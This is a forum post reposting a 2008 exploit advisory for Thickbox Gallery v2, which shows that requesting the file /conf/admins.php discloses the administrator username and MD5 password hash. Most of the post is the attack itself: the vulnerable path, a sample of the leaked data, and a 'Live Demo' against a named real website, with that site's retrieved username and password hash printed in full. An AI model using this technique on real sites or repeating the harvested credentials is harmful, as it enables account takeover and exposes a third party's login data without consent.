Jump to content
SirGod

Thickbox Gallery v2 (admins.php) Admin Data Disclosure Vulne

By SirGod, in Exploituri

Recommended Posts

  • Active Members
SirGod Contributor

SirGod

Posted
  • Active Members
Posted 
#########################################################################################
[+] Thickbox Gallery v2 Admin Data Disclosure
[+] Discovered By SirGod                         
[+] MorTal TeaM                        
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
##########################################################################################

[+] Arbitrary Admin Data Disclosure

    - Go here and you will see the admin data ( login name + crypted password as MD5 )

       [url]http://localhost/[/url][Path]/conf/admins.php

    - Admin data :

          a:1:{s:5:"admin";s:32:"d73ed8a01f624fcb878296bc7ff302bc";}

    - Now extract the admin username and the hash :

        Username : admin

        Password : d73ed8a01f624fcb878296bc7ff302bc

[+] Live Demo

         [url]http://www.davilin.com/tbg/conf/admins.php[/url]

    - Retrived :

          a:1:{s:8:"ytakenak";s:32:"56bd1d32bcb1fbd2609e4d7634febbd1";}

    - Name + Password

        Username : ytakenak

        Password : 56bd1d32bcb1fbd2609e4d7634febbd1


##########################################################################################

# milw0rm.com [2008-08-26]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...